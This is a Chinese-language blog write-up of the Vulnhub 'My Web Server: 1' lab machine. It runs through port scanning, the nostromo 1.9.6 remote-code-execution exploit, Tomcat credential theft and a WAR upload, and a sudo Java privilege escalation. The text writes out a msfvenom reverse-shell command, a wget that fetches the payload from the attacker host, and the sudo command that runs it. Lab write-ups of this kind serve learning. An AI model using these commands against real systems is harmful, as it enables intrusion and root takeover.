当前位置:首页 > CTF > 正文内容

CTF_Vulnhub My Web Server:1—Writeup

UzJu2年前 (2022-04-17)CTF706

CTF_Vulnhub My Web Server:1—Writeup

Get Box:https://www.[vulnhub.com/entry/my\-web\-server\-1,463/](http://vulnhub.com/entry/my-web-server-1,463/)

559af6a265597edc7090793df8bfb621.png

下载好OVF后直接导入虚拟机即可

d6df910d8fa20fa1cb1fac02a28675b5.png

不错可以直接看到IP,那么就打开kali linux开始吧

2b17aff22100e0ab29d0c8ddf9facb60.png

打开卡里二话不说直接一顿NMAP

de2ac4e168560627a5b9ba277a5b3c33.png

可以很清楚的看到22,80,2222,3306,8009,8080,还有8081端口开放

c88d5fb6e6488c16c0dedb95f71a0189.png

查看80端口 还有8080 80801 2222

703e98e553877f9c83be55d25ba70f79.png

f2bb1fceb29041d0f133a5044786dee3.png

随便尝试一下看看是否存在默认密码等

很明显失败了

199b3454b3396f7e22ff976040dbcee8.png

再看看8081端口

816b07b57f75444bbb230717a07f5207.png

e09b0e48e6617eb60ad6307cb8926188.png

类似于一个博客吧

再看看2222端口

4b90ea6801ae5cf34e67340ee9d1659a.png

7ea52ba13ff2b41b8bc7046f3ca1d81b.png

哦天呐太多好看的小姐姐了吧

c1e1a02d6e4a9f5fca480f83b3f1aa7c.png

也是一个类似博客的网页

那么现在就直接进入正题吧通过dirb nikto searchsploit等工具的信息收集发现searchsploit发现2222号端口的nostromo1.9.6有远程代码执行漏洞

dirb大量的扫描结果

b6edac7fd5db1ecb4146672606880e88.png

nikto扫描结果

9c623ab80181954e8f0dbedc71d29480.png

Searchsploit扫描结果

be3068cd27bdbbf7067a70d87b7adc95.png

关于这个nostromo我在看雪论坛也发现一篇翻译的文章 有兴趣可以去看看(https://bbs.[pediy.com/thread\-256798.htm)](http://pediy.com/thread-256798.htm%EF%BC%89)

首先cp

7ea81b515af6291699934d7e36171e65.png

5fcc3208e5d59ae1449d8477d7d4964f.png

直接python会报错 我开始还以为是程序问题 后来发现直接注释掉就行

07348dcd286341c721d6fe500af4d569.png

63c4f8c988f8e61571201f33139b23cb.png

用法比较简单就是IP +端口+命令

先试试python 47837.py 192.168.0.100 2222 whoami

b6ec387e748e0b7e3592fec034ee49cc.png

python 47837.py 192.168.0.100 2222 id

a5d74cd76f5e2e0970d3eb9176784bbc.png

那么先GETSHELL吧

用kali自带的

974933bdb760454c13d6e9a3949829f1.png

91d8aa970d5b1f3d947ffef4f32264d9.png

改自己卡里IP和你要的端口 随意奥

启动阿帕奇

527ea280e8f1247df44a1afca71efbf9.png

2991bbd6bd1ce00b3221e0358d5141a4.png

ed810e3473f987a44fe6e0747b14e7cd.png

Nc start

d442b2e8806b3cad36adc46f9b80e676.png

563db582abbe9e928bf7a2ba50f40b9c.png

5fab6c008cf3c1ab7938abcf07d0d726.png

然后python -c import“pty;pty.spawn(‘/bin/bash’)

677b007cc0568418098dfa46ae27815b.png

bbb7fad7a59196a59434736ae42b52ca.png

ad333335324a0e99b29ca23fa175e4ec.png

通过查看tomcat-users.xml可以发现TOMCAT的管理后台密码

2ba7dd3ae055c8a1b608839dbc6918e0.png

7124e1754d9a3a9c37ed17883c70cf49.png

msfvenom生成一个war

然后上传即可

953985ca15fcba0c2cffdc8123399785.png

然后访问http://192.168.0.100:8080/exp/

e2ef92af325527a71c170dfe20cc727e.png

48c77846b50311e28071ac4ef281e760.png

d37d6fbbb564360127129649174adcb5.png

现在已经切换到了TOMCAT用户 其实本来不想这么麻烦的 只是我试了一下直接切换TOMCAT用户 能用到的密码都失败了

Sudo -l

287e97c3a1d5922ed7b634e98d3426b2.png

msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.108 LPORT=7775 -f jar > expjar.jar

启动NC监听并把生成的jar复制到var/www/html目录下

d15e2aed8c4adccae2fa984c9e4c133a.png

Wget http://192.168.0.108/expjar.jar

8ac8d121a302a354ff943a896c5dcf4c.png

然后sudo /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java -jar ./expjar.jar

17f4f93f8431b05d04eb82e223e0fac0.png

5802193207350e2372a018e64e7baa8b.png

fb7d47a6ead833608becb4d16a11a918.png

扫描二维码推送至手机访问。

版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接:https://uzzju.com/post/57.java

标签: HackTheBox
分享给朋友:

相关文章

合天网安Web-CTF-WriteUp

合天网安Web-CTF-WriteUp

Web-CTF-WriteUp一、前言旧文,师傅们随便看看 二、WriteUp①、编码1、神奇的磁带-WriteUp 漏洞地址:10.1.1.147:5001Burp抓包 对应题目,神奇的磁带(tape)flag是:Flag{ctf_v...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。